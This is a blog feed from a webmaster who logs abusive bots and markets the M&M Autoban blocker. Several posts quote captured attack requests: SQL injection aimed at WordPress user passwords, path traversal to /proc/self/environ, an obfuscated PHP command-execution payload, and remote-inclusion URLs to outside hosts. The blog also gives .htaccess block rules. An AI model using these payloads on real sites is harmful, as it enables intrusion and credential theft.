tag:blogger.com,1999:blog-339232182015-02-03T15:25:18.023-06:00Web RobotsWeb robots are visiting sites to hack, spam, email harvest and to scrap your website contect for profit.
This blog is an atempt to keep track of them and to help webmasters by listing the abuse in google.<a href="http://feeds.feedburner.com/WebRobots" title="Subscribe to my feed, Web Robots" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon16x16.png" /></a>tmasternoreply@blogger.comBlogger193125tag:blogger.com,1999:blog-33923218.post-80085345378631900452012-03-30T16:38:00.000-05:002012-03-30T16:39:21.070-05:00New uploadM&M autobam v4.8 has been uploaded. This version adds country ban by ip<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com0tag:blogger.com,1999:blog-33923218.post-54961503598503768722011-12-16T10:59:00.005-06:002011-12-16T14:01:31.866-06:00webmasters how to disable google relatedFrom :http://www.lunarlog.com/google-related-privacy/<br />Reposting: I have not been able to find a way to disable Google related if you have not seen it you had better check out whats showing up on your website.<br /><a target='_blank' title='ImageShack - Image And Video Hosting' href='http://imageshack.us/photo/my-images/694/instawaresrelated.gif/'><img src='http://img694.imageshack.us/img694/6661/instawaresrelated.gif' border='0'/></a><br /><br /><br />File a complaint here <a href="https://www.ftccomplaintassistant.gov/">https://www.ftccomplaintassistant.gov/</a><br /><br /><blockquote>Google Related Program and My Privacy Issues<br /><br />I spent the last cou­ple of weeks updat­ing my main web­site Lunarstu­dio - mostly repro­gram­ming and adding new images. When updat­ing web­sites, most respon­si­ble web­mas­ters and design­ers will run their site through addi­tional browsers, oper­at­ing sys­tems, and test people’s reac­tions to new con­tent. I had a friend look at my site on Sun­day to see if she had any feed­back. Out of the cor­ner of my eye, I noticed a full-width bar appear at the bot­tom of my page on her mon­i­tor. My first reac­tion was “WTF”, fol­lowed by con­cern that some­how I must have uploaded mal­ware to the back-end of my site. The third option which was slightly more wor­ri­some is that some hack­ers got into my site. So I took a closer look, and the bot­tom left read “Google Related” (don’t install this.)<br /><br />Now, I would never think Google would have released a tool­bar that cov­ered up part of the screen. Not only was it dis­tract­ing from the design I had worked so hard it, but it wouldn’t just affect me but almost every web­mas­ter and designer on the planet. So my next thought that it had to be some mal­ware she acci­den­tally down­loaded over the course of her Inter­net trav­els. Upon even closer inspec­tion, I noticed that it was serv­ing up adver­tise­ments and con­tact infor­ma­tion from com­peti­tors. So some­one look­ing at my site could see another image at the bot­tom of the screen, then decide to go to that web­site instead.<br /><br />I started to look into this. Sure enough, it’s part of a new, 20-day old Google pro­gram which is a tool­bar exten­sion for Inter­net Explorer and Chrome. ArsTech­nica wrote a con­cise arti­cle on what Google Relate does here. While it might prove use­ful for some users, for web­mas­ters and those con­cerned with pri­vacy, this is an absolute night­mare. It rep­re­sents a major down­fall in Net Neu­tral­ity if this is allowed to carry on. *Aside* — some might argue that Google is not a tele­com, Inter­net Provider, or gov­ern­ment agency and hence doesn’t fall into the argu­ment of threat­en­ing Net Neu­tral­ity. How­ever, I should remind peo­ple that Google has men­tioned that it’s test­ing their Inter­net Pro­vid­ing ser­vices. Also, Android runs on many cell­phones as well as tele­com providers. They’re basi­cally in bed with one another.<br /><br />There’s sev­eral dif­fer­ent and valid con­cerns, not to men­tion the legal­ity of this program:<br /><br />1.It inter­feres with a per­son or company’s intended web­site design with­out their permission.<br />2.It poten­tially dis­tracts an end-user.<br />3.It slows down a person’s web­site load­ing time. The speed issue is prob­a­bly neg­li­gi­ble, but it’s still there with­out an owner’s permission.<br />4.It risks hav­ing peo­ple leave your web­site in favor of another. Hold­ing user reten­tion on a landing-page is tough enough, but this just adds fuel to the fire.<br />5.Due to peo­ple wan­der­ing off one’s web­site, it can jeop­ar­dize web­site owner’s busi­nesses and livelihoods.<br />6.Google is directly (or indi­rectly) prof­i­teer­ing from some­one else’s work with­out their permission.<br />7.This is poten­tially part of their AdWords pro­gram, which makes money off of advertisements.<br />8.It allows for Google to mon­i­tor your brows­ing habits, even when not using Google search. It’s basi­cally spy­ing on your activities.<br />9.It poten­tially opens up the door for fur­ther abuse.<br />10.It threat­ens Google’s com­peti­tors (Yahoo!, Bing, and other search engines.) If suc­cess­ful, com­peti­tors might also have to roll out sim­i­lar tool­bars or methods.<br />11.It could become a per­ma­nent part of Google Chrome.<br />Now, there’s some use­ful­ness to the end-user. It wouldn’t be fair for me to men­tion the Google Related neg­a­tives with­out the positives:<br /><br />1.Pro­vides directions.<br />2.Pro­vides alter­na­tive solu­tions for some­one look­ing for a ser­vice or help.<br />I was almost pos­i­tive Google would pro­vide web­mas­ters with a method to take this off of owner’s web­sites through the use of META tags, but my searches for that method turned up empty. Instead, I came across other “unap­proved” meth­ods of using CSS code to dis­able the iframe, either by mov­ing the tool­bar off-screen, or by hid­ing the iframe com­pletely. Unfor­tu­nately, I tried these meth­ods and it didn’t work. It seems that Google caught on to web­mas­ters chang­ing their CSS code, and in turn updated their own to pre­vent us from doing so.<br /><br />Since then, I’ve brought it to the atten­tion of some friends on Face­book, how­ever I think my con­cern has largely fallen on deaf ears which is under­stand­able. I’ve also writ­ten on the Google Forum where you can see there my con­cern is #6. Some might call it an over­re­ac­tion, but I think I’m fully jus­ti­fied here. The peo­ple report­ing this prob­lem is so low at the moment because Google Related is just start­ing to get atten­tion. This is part of the rea­son why I’m writ­ing about it on my blog — it’s to bring atten­tion to this.<br /><br />My main issue is that Google is intrud­ing upon my work and busi­ness with­out per­mis­sion. The nail in the cof­fin is that they are also poten­tially prof­i­teer­ing with­out my per­mis­sion too. I think it’s just a mat­ter of time before Google is:<br /><br />1.Sued by competitors.<br />2.Depart­ment of Jus­tice goes after them and tries to break up the monopoly.<br />3.Pub­lic out­rage from the web­mas­ters com­mu­nity gets out of control.<br />4.Or they dis­able it before it gets to any of the points listed above.<br />I hope I am overly con­cerned, and that Google dis­ables their new pro­gram almost as soon as it has started. How­ever, it blows my mind how this idea got past scores of lawyers, exec­u­tives, man­age­ment, and employ­ees at a bil­lion dol­lar com­pany in the first place. If you agree with my con­cerns, please pro­mote this arti­cle and also express your con­cern on the Google Related Forum. If you dis­agree, I’m still inter­ested in hear­ing your views</blockquote><div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com0tag:blogger.com,1999:blog-33923218.post-91761771007447170532011-03-11T11:02:00.001-06:002011-03-11T11:05:19.239-06:00"Script Injections" listBots vs Browsers - has a new list of all injection atempts.<br /><br />If your keeping up with this you need to look through this list and add the keywords to block to the hackers.txt file.<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com0tag:blogger.com,1999:blog-33923218.post-24920366775547273332011-03-08T08:58:00.002-06:002011-03-08T09:06:57.359-06:00mas email problemsI have just discovered that the email option of my script can trigger the mas email alarms on the free host. They use this alarnm to stop spammers.<br /><br />If your running the script on a free host you need to disable the emails until I can build a outbox system that will send merge the emails into 1 message once a day.<br /><br />go into autoban and change all mail commands to <br />//mail<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com0tag:blogger.com,1999:blog-33923218.post-74218424291775652262011-03-08T08:45:00.001-06:002011-03-08T08:58:23.465-06:00182.114.206.25 hn.kd.ny.adsl union injection hacker20and%205=6%20union%20select%200x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E%20-- <br /><br />from ip 182.114.206.25 hn.kd.ny.adsl<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com1tag:blogger.com,1999:blog-33923218.post-33945924878993550962010-08-26T15:06:00.002-05:002010-08-26T15:10:32.558-05:00as13448.com trafficMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SU 2.011; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.1) <br />All Hits From static-208-80-194-34.as13448.com 208.80.194.34 <br /><br /><br />I am getting a lot of bot traffic from lots of ips on subdomains of as13448.com<br />The website as13448.com is not a ISP so all of those ips need to be blocked.<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com1tag:blogger.com,1999:blog-33923218.post-7073265136802125862010-05-24T09:50:00.003-05:002010-05-24T11:10:54.300-05:00mylife.com privacy violations.Mylife.com is running TV advertisments and getting a lot of traffic so I checked them out and was shocked to see that when you go to the site and enter your name approx age and zip that the system will come back to you and display your XXX (private info)<br /><br />Check it out yourself and once your upset help by complaining abbout this huge privacy violation. They are helping create identity fraud.<br /><br />File a complaint here <a href="https://www.ftccomplaintassistant.gov/">https://www.ftccomplaintassistant.gov/</a><br /><br />And you may also want to go to www.privacyrights.org and report this so they can start tracking this company. <a href="http://www.privacyrights.org/contact">http://www.privacyrights.org/contact</a><br /><br />It is likely that they will not have this information for all states. If they do display private info on you please let us know.<br /><br />Also see <a href="http://www.complaintsboard.com/bycompany/mylifecom-a123026.html">www.complaintsboard.com</a><br /><br />Also see <a href="http://www.consumeraffairs.com/online/mylife.html">http://www.consumeraffairs.com/online/mylife.html</a><br /><br /><br />Also see <a href="http://techpaul.wordpress.com/2009/03/06/just-say-no-to-mylifecom/"> Just say no to Mylife.com</a><br /><br /><blockquote>Better Business Bureau<br />This company practices what the Los Angeles Better Business Bureau calls negative option cancellation. In this sales strategy, customers agree to pay for services unless they cancel within a specified period of time. Members are required to cancel prior to the initial anniversary date to avoid continuing annual charges to their credit cards.[6]<br /><br />Complaints from customers not resolved in a satisfactory manner caused the Los Angeles Better Business Bureau to rate Reunion.com 'F'.[7]<br /><br />The BBB was concerned that the company used misleading advertising practices by e-mailing customers advising them that people 'may' be searching for them, and offers them to become paid members to find the identity of any people that may search for them in the future. In its FAQ section, the Reunion.com site describes this feature as follows: "'Who's Searching For You' will reveal the listed names of the specific users who have performed a search using your first and last (current or Maiden) names and your age range within 5 years of your listed date of birth and is still saved in their Search History'.[8]<br /></blockquote><div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com0tag:blogger.com,1999:blog-33923218.post-36407001611486224182010-02-07T22:08:00.002-06:002010-02-07T22:13:52.375-06:00New York spam on Road RunnerNYC Rentals<br />nestseekers.com/Properties/Rentals/Manhattan<br />manhattanadmin@gmail.com<br />74.68.123.67 Submitted on 2010/02/06 at 7:25pm<br />very nice blog.<br /><br />very nice blog. manhattanadmin@gmail.comNYC<br />Rentalshttp://www.nestseekers.com/Properties/Rentals/Manhattanspam<br /><br />1 #<br /> NYC Apartments<br />nestseekers.com/Properties/Rentals/Manhattan<br />manhattanadmin@gmail.com<br />74.68.123.67 Submitted on 2010/02/06 at 5:44pm<br />interesting.<br /><br /><br />1 #<br /> NYC Rentals<br />nestseekers.com/Properties/Rentals/Manhattan<br />manhattanadmin@gmail.com<br />74.68.123.67 Submitted on 2010/02/06 at 5:28pm<br />very nice blog.<br /><br /><br /><br />1 #<br /> Free Image Hosting<br />imagehosting21.com<br />admin@imagehosting21.com<br />74.68.123.67 Submitted on 2010/02/06 at 10:45am<br />good blog keep it up.<br /><br />good blog keep it up. admin@imagehosting21.comFree Image<br />Hostinghttp://www.imagehosting21.comspam<br /><br /><br />1 #<br /> Free Image Hosting<br />imagehosting21.com<br />admin@imagehosting21.com<br />74.68.123.67<br /><br /><br />Sent a complaint to RR admin and got this crap back. Looks like RR does not care about blog spam. I already sent them the time and IP of the abuser. And they ignored that.<br /><br /><br />Hello,<br /><br />Road Runner supports the free flow of information and ideas over the Internet. Road Runner does not <br />actively monitor nor does Road Runner exercise editorial control over the content of any web site, <br />electronic mail transmission, mailing list, news group or other material created or accessible over <br />Road Runner services.<br /> <br /><br />If you feel that a Road Runner subscribers activities constitute harassment and have contact <br />information for them, please write them an email, CCing Abuse@rr.com, requesting that they "cease <br />and desist" contact with you. <br /><br /><br />If you receive further contact from the Road Runner subscriber after that point, or do not have <br />contact information for them: DO NOT REPLY or correspond with that person further. Please instead <br />forward all documentation to abuse@rr.com, which should include: full email headers or webserver <br />logs showing posts made on a message board or other Internet forum (these would typically be <br />obtained from the administration of that site). Logs would need to contain the following <br />information, for Road Runner to process them: Date of Incident, Time of Incident, Time Zone, <br />Offender IP, URL of site or offending posts. Road Runner will not accept logs that are not in plain <br />text (ascii) format. Do not attach files to your e-mail. All logs must be included in the body of <br />the message.<br /><br />Thank you for taking the time to contact Road Runner.<br /><br />- Road Runner Abuse [SM]<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com1tag:blogger.com,1999:blog-33923218.post-82016807626537760052008-05-26T18:14:00.003-05:002010-02-03T01:42:38.901-06:00Mozilla/5.0 (MrCarlito-0.1 http://www.mrcarlito.com/spider.html)bad-behavior<br /> 403 Required header 'Accept' missing <br />Agent: Mozilla/5.0 (MrCarlito-0.1 http://www.mrcarlito.com/spider.html) <br />64.237.57.194 64-237-57-194.reliableservers.com <br /><br /><blockquote>MrCarlito-0.1 is an experimental spider that collects header & link information from web pages. The spider is written in PERL (Practical Extraction and Report Language), and uses the LWP::UserAgent Class. Currently this spider does not delve into websites, it simply obtains the headers & hostnames contained in your web page index.</blockquote><br /><br />Humm you had better fix this broken bot if you plan on using it for a real website.<br />Your blocked because you were detected loading webpages not headers.<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com3tag:blogger.com,1999:blog-33923218.post-84680107913533248142009-06-24T18:57:00.010-05:002009-07-29T12:35:58.638-05:00IE 8 breaks subdomains making them hard to read using domain highlightingDomain Highlighting in Internet Explorer 8 (IE8) now blanks the subdomain and following text after the domain.<br /><br /><a href='http://img209.imageshack.us/i/ie8c.jpg/'><img src='http://img209.imageshack.us/img209/4404/ie8c.jpg' border='0' alt='Image Hosted by ImageShack.us'/></a><br/><br /><br />This is nuts it makes this site read blogger.com and you can not see the subdomain who's lamo ideal is this. Its one thing to make the main domain a diff color its another to hide the entire URL.<br /><br />Someone has to find a way around this must be some way you can higlight the URL bar using java so the subdomain will be visable. Or someway to force IE8 into ie7 mode. We own our subdomains and M$ has no right to blank them out. They are part of our domain names and part of our keywork usage.<br /><br /><br />This has to be fixed.<br /><br />Microsoft is taking away our legal use of subdomains. <br />Websites who use subdomains are not crooks we are legaly using 1 domain to create many websites. Just because some crook used a subdomain they should not be hidden.<br /><br /><br />Zdnet says <a href="http://community.zdnet.co.uk/blog/0,1000000567,10008836o-2000331855b,00.htm">IE8 puts dim wits ahead of tech savvy.</a><br /><br /><a href="http://aidanwalsh.net/2008/03/on-ie8-domain-highlighting/">aidanwalsh.net</a> says <blockquote>why do you have to obfuscate the rest of the URL information by default? No part of a URL is irrelevant, and information contained in URLs is becoming more and more relevant as time goes on (logically structured URLs, URL based identity management, etc). Why do I need to hold my mouse over the address bar to be able to see this? Surely there are better ways to emphasise the domain block of the URL? Embolden it. Change the colour of the domain, not the rest of the URL. </blockquote><br /><br /><br />domain highlighting, ie 8 domain name greayed out, ie8 address bar subdomain, ie8 subdomains broken, making the subdomain visible in ie8<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com2tag:blogger.com,1999:blog-33923218.post-74805438056573978922009-06-30T17:57:00.002-05:002009-06-30T17:58:16.159-05:00wrangler.websitewelcome.com botAgent: -NO AGENT- <br />74.52.200.178 wrangler.websitewelcome.com <br /><br />Just what is this bot. It doesnt have a useragent and the website websitewelcome.com has no info on it just a email contact address. <br /><br />websitewelcome.com added to the block list<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com2tag:blogger.com,1999:blog-33923218.post-33621116198798108122009-06-30T17:50:00.003-05:002009-06-30T17:55:43.828-05:00useragent spamer www.ongarofrancesco.orgAgent: (a href="http://www.ongarofrancesco.org">Independent Security Researcher(/a> Independent Security Researcher(/a>" target=\_BLANK"> <br />79.45.39.47 host47-39-dynamic.45-79-r.retail.telecomitalia.it <br /><br />This bot tries to spam your useragent logs that some sites post with links to a website at www.ongarofrancesco.org <br /><br />This looks to be some hacker ref site. The bot is from Italy<br /><br />This just goes to show why you should not have scripts on your site that displays the useragents that you have logged to the internet. Because they can contain HTML<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com0tag:blogger.com,1999:blog-33923218.post-1157650822060323552006-09-07T12:12:00.001-05:002009-03-07T23:20:47.271-06:00security.lightspeedsystems.com abusebad-behavior 400 Required header 'Accept' Missing. <br />Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215) <br />66.17.15.154 66-17-15-154.security.lightspeedsystems.com <br /><br />Thought to be a scrapper. <a href="http://willmacc.wordpress.com/2006/08/31/lightspeed-scraper-or-crawler/">See other info here</a><br /><br />Reports now say that this is content filtering.<br /><a href="http://www.lightspeedsystems.com/Contentfiltering.asp">lightspeedsystems.com </a><br />If it is its the worst bot ever writen because it fakes its useragent and sends ilegal headers. Clearly not the tec leaded it says on the website.<br /><br />Writing to lightspeed and waiting for a reply. <br /><br />Update:<br />lightspeedsystems.com refuses to reply to my emails so its banned I don't care what they say it is. It is abuse because they are faking the useragents and are using improper headers and they do not identify themselves in the scan. <br /><br /><br />added domain ban<br />lightspeedsystems.com,Wont reply to emails abuse<br /><br />Also banned by all blogs using Bad Behavour<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com5tag:blogger.com,1999:blog-33923218.post-6313237017208395352009-01-20T13:47:00.003-06:002009-01-20T13:55:03.494-06:00strange code on wp blog detectedmmautoban has detected the following code being used on a WP blog.<br /><br />Antyone know what this is.<br /><br />/functionnumber-%20iterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20index%20=%20-number-%20slices%20=%20-%20array%20=%20this.toArray;%20%20%20%20while%20index%20+=%20number%20%20array.length%20%20%20%20%20%20slices.pusharray.sliceindex-%20index+number;%20%20%20%20return%20slices.collectiterator-%20context;%20%20<br /><br />/functionfilter-%20iterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20results%20=%20;%20%20%20%20if%20Object.isStringfilter%20%20%20%20%20%20filter%20=%20new%20RegExpfilter;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20if%20filter.matchvalue%20%20%20%20%20%20%20%20results.pushiteratorvalue-%20index;%20%20%20%20;%20%20%20%20return%20results;%20%20 <br /><br />/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20result;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20value%20=%20iteratorvalue-%20index;%20%20%20%20%20%20if%20result%20==%20undefined%20%20value%20=%20result%20%20%20%20%20%20%20%20result%20=%20value;%20%20%20%20;%20%20%20%20return%20result;%20%20 <br /><br /><br />/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20result;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20value%20=%20iteratorvalue-%20index;%20%20%20%20%20%20if%20result%20==%20undefined%20%20value%20%20result%20%20%20%20%20%20%20%20result%20=%20value;%20%20%20%20;%20%20%20%20return%20result;%20%20 GET <br /><br />/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20trues%20=%20-%20falses%20=%20;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20iteratorvalue-%20index%20?%20%20%20%20%20%20%20%20trues%20:%20falses.pushvalue;%20%20%20%20;%20%20%20%20return%20trues-%20falses;%20%20<br /><br /><br /><br />/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator.bindcontext;%20%20%20%20return%20this.mapfunctionvalue-%20index%20%7B%20%20%20%20%20%20return%20%7Bvalue:%20value-%20criteria:%20iteratorvalue-%20index%7D;%20%20%20%20%7D.sortfunctionleft-%20right%20%7B%20%20%20%20%20%20var%20a%20=%20left.criteria-%20b%20=%20right.criteria;%20%20%20%20%20%20return%20a%20%3C%20b?%20-1%20:%20a%20%20b%20?%201%20:%200;%20%20%20%20.pluckvalue;%20%20<br /><br /><br /><br />%20null%20:%20fillWith;%20%20%20%20return%20this.eachSlice(number-%20function%20(slice)%20{while%20(slice.length%20%3C%20number)%20{slice.push(fillWith);}return%20slice;});} <br /><br /><br />It has about 15 other version I suspect it is some type of atack.<br />Unless some plugin is malfunctioning. <br />Anyone have any info what this code is?<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com2tag:blogger.com,1999:blog-33923218.post-9561096340874667682009-01-15T15:40:00.002-06:002009-01-15T15:44:13.321-06:00OSCommerce modsOScommerce Notes<br />===============<br />A rare bug has been detected in OScommerce. If the customer does not select a payment at checkout the browser is redirected to <br /><br />/checkout_payment.php?error_message=Please+select+a+payment+method+for+your+order<br /><br />This generates a +select+ injection hack detection in mmautoban.<br /> To prevent this error edit your OSCommerce english.php file and change the error statement from <br />Please Select to Please Pick <br /> this will prevent customers from getting banned.<br />It is unknown if other such errors exist in other places or other programs. <br />If you see any please report them.<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com1tag:blogger.com,1999:blog-33923218.post-87021102588391824752008-12-03T23:21:00.004-06:002008-12-03T23:27:30.401-06:00'mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol' wordpress hackerJust detected this hacker. the ip is block by no-more-funn.moensted.dk <br /><br />What is this useragent? (k1b compatible; rss 6.0; windows sot 5.1 security kol)<br /><br />www._____.com/index.php?cat=%2527+UNION+SELECT+CONCAT(666-CHAR(58)-user_pass-CHAR(58)-666-CHAR(58))+FROM+wp_users+where+id=1/* <br />Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol) <br />58.241.255.38 <br /><br />www._____.com/index.php?cat=999+UNION+SELECT+null-CONCAT(666-CHAR(58)-user_pass-CHAR(58)-666-CHAR(58))-null-null-null+FROM+wp_users+where+id=1/* <br />Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol) <br />58.241.255.38 <br /> <br />www._____.com/wp-trackback.php?p=1 <br />Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol) <br />58.241.255.38 <br /><br />www.____.com/xmlrpc.php<br />Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol) <br />58.241.255.38<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com0tag:blogger.com,1999:blog-33923218.post-66414360255684859692008-11-20T18:10:00.004-06:002008-11-20T18:21:12.552-06:00babycaleb.mvhosted.com hacker atacksBaby hacker has moved to http://babycaleb.mvhosted.com<br /><br />And his baby bots are now trying to inject this new url into websites.<br />The site when inspected using Spam Spade to avoid any virus infection shows the exploit is in the html just like before.<br /><br />A search shows its infected many websites. <a href="http://www.google.com/search?q=babycaleb.mvhosted.com">http://www.google.com</a><br />Parsing input: http://babycaleb.mvhosted.com<br />Host babycaleb.mvhosted.com (checking ip) = 74.53.187.178<br />host 74.53.187.178 = picsfolio.com.187.53.74.in-addr.arpa (cached)<br />Host babycaleb.mvhosted.com (checking ip) = 74.53.187.178<br />host 74.53.187.178 = picsfolio.com.187.53.74.in-addr.arpa (cached)<br />Routing details for 74.53.187.178<br />[refresh/show] Cached whois for 74.53.187.178 : abuse@theplanet.com<br />Using abuse net on abuse@theplanet.com<br />abuse net theplanet.com = abuse@theplanet.com<br />Using best contacts abuse@theplanet.com<br /><br /><br />Send abuse messages to theplanet.com<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com0tag:blogger.com,1999:blog-33923218.post-14605393276342445252008-11-08T20:31:00.014-06:002008-11-20T18:17:30.689-06:00babycaleb.fortunecity.co.uk hacker now shut down.Am getting a lot of these request lately<br /><br />/shop/catalog/product_info.php?cPath=http://babycaleb.fortunecity.co.uk/index.htm <br /><br />They are from lots of IPS all trying to remote load this page. Inside that page is a hack atempt. AVG gives an alarm if you try to view the source.<br /><br />Do not go to the website <strong>babycaleb.fortunecity.co.uk</strong> AVG detects a virus but it still gets into your system. Look for ..<br /><strong>c:\windows\system32\tools\regexe.exe</strong> <br />a <strong>trojan horse downloader.generic8.cox </strong> <br /><br />--updated-<br />The site has now been shutdown.<br /><br />A search of google <br /><a href="http://www.google.com/search?q=babycaleb.fortunecity.co.uk">http://www.google.com/search?q=babycaleb.fortunecity.co.uk</a> shows that sites all over the net are infected with this atack and they are allowing the atack to spread. Perhaps they are involved in the atack?<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com9tag:blogger.com,1999:blog-33923218.post-4292568379839366742008-11-12T14:31:00.002-06:002008-11-12T14:35:45.947-06:00itsapic.com/crawler.html another beta208.43.85.166<br />Required header 'Accept' missing GET / HTTP/1.0<br />User-Agent: Mozilla/5.0 (compatible; itsapic.com_crawler/0.01 +http://itsapic.com/crawler.html; crawler@itsapic.com)<br />Connection: close<br />Referer: http://u.webring.com/hub?ring=xxxxxxxxxxxxxxxx<br /><br /><br />This bot was scanning webing looking for sites and got blocked by BB so watch for it.<br />Website does not tell what its doing or ask permission to enter your site.<br /><br /><br />add to robots<br />User-agent: itsapic.com_crawler<br />Disallow: /<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com0tag:blogger.com,1999:blog-33923218.post-1900170436259109532008-09-11T09:54:00.004-05:002008-09-11T10:15:58.740-05:00serverkompetenz.net Hackersserverkompetenz.net is a hacker not a spambot.<br /><br />.com/nuke/index.php?k=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ GET HTTP/1.1 <br />Agent: <PRE> $x0e="\145x\x65\x63"; $x0f="\x66eo\146"; $x10="\x66\x72ea\x64"; $x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73"; $x12="i\163\x5f\162\x65s\157ur\x63\x65"; $x13="\152\157\x69\156"; $x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73"; $x15="ob\137\x65\156d\137\x63lea\156"; $x16="\x6fb_st\x61\x72\164"; $x17="\x70\141\163s\164\x68\162\165"; $x18="\x70\143\154ose"; $x19="p\157\160e\x6e"; $x1a="\163h\145\154l\137\x65\170e\143"; $x1b="\x73\x79s\x74e\x6d"; function x0b($x0b){ global $x0e-$x0f-$x10-$x11-$x12-$x13-$x14-$x15-$x16-$x17-$x18-$x19-$x1a-$x1b; $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b-$x0c);$x0c = $x13("\n"-$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b-"\x72"))){ $x0c = ""; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d-1024); } @$x18($x0d);} } return $x0c;}echo x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");</pre><br /> <br />81.169.152.101 h986442.serverkompetenz.net <br /><br />Bot atempted to include some script in place of its user agent string.<br /><br />It then tried to remote load a script.<br />Blacklist Domain Ban: serverkompetenz.net <br />.com/nuke/index.php?k=http://www.jfc.info/jfcinfo/grafiken/i??? GET HTTP/1.1 <br />Agent: http://cr4nk.ws/ [de] (windows 3.1; i) [crank] <br />81.169.152.101 h986442.serverkompetenz.net<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com1tag:blogger.com,1999:blog-33923218.post-37662598401198983022008-08-22T22:49:00.000-05:002008-08-23T00:00:55.594-05:00DECLARE%20@S%20CHAR(4000);SET%20@S=CASTThe latest hack running right now is a injection atempt using a string like this.<br /><br />DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C----removed----%20AS%20CHAR(4000));EXEC(@S);<br /><br />This is a bot atack and is comming from everywhere. <br />The come in 2 at a time from the same IP.<br /><br />They are trying to inject some code into your site to display a iframe that will take people to another site. It doesnt look like they are atacking PHP they are atacking ASP Cold Fusion and Perl <a href="http://isc.sans.org/diary.html?storyid=4771">See more here isc.sans.org</a><br /><br />Also see this <a href="http://www.webmasterworld.com/search_engine_spiders/3725038.htm">post </a> which recomends.<br /><br /><br />RewriteCond %{REQUEST_URI} ^(.*)CAST(.*) [OR] <br />RewriteCond %{REQUEST_URI} ^(.*)DECLARE(.*) [NC,OR] <br /><br />But a better page on how to block this by .htaccess is <a href="http://www.0x000000.com/?i=567">located here. </a><br /><br /><br />They are also scanning for a delay in page return so any script that sleeps when it detects a hack must have the sleep removed or they will come back and hit you harder.<br /><br /><br />Just the hits will bring you server down if you try to ban all the IPS being used so I have modified the hacker modules.<br /><br />Update <a href="http://www.box.net/shared/nk40gde139">hacker modules</a> Here.<br /><br /><br /><br /><br />You will also want to download your databases and scan them for IFRAMES and java script.<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com5tag:blogger.com,1999:blog-33923218.post-34950662441741815702008-08-06T09:52:00.003-05:002008-08-06T10:00:52.410-05:00magnum.liquidweb.com hackerAgent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 2.0.50727; .net clr 1.1.4322) <br />64.91.248.2 magnum.liquidweb.com <br />string=[ feed=http%3A%2F%2Fchyngachanga.ru%2Fcontent%2Fwuge%2Fowofi%2F ] <br />hacker hits with this string trying to get my server to run his scripts.<br /><br 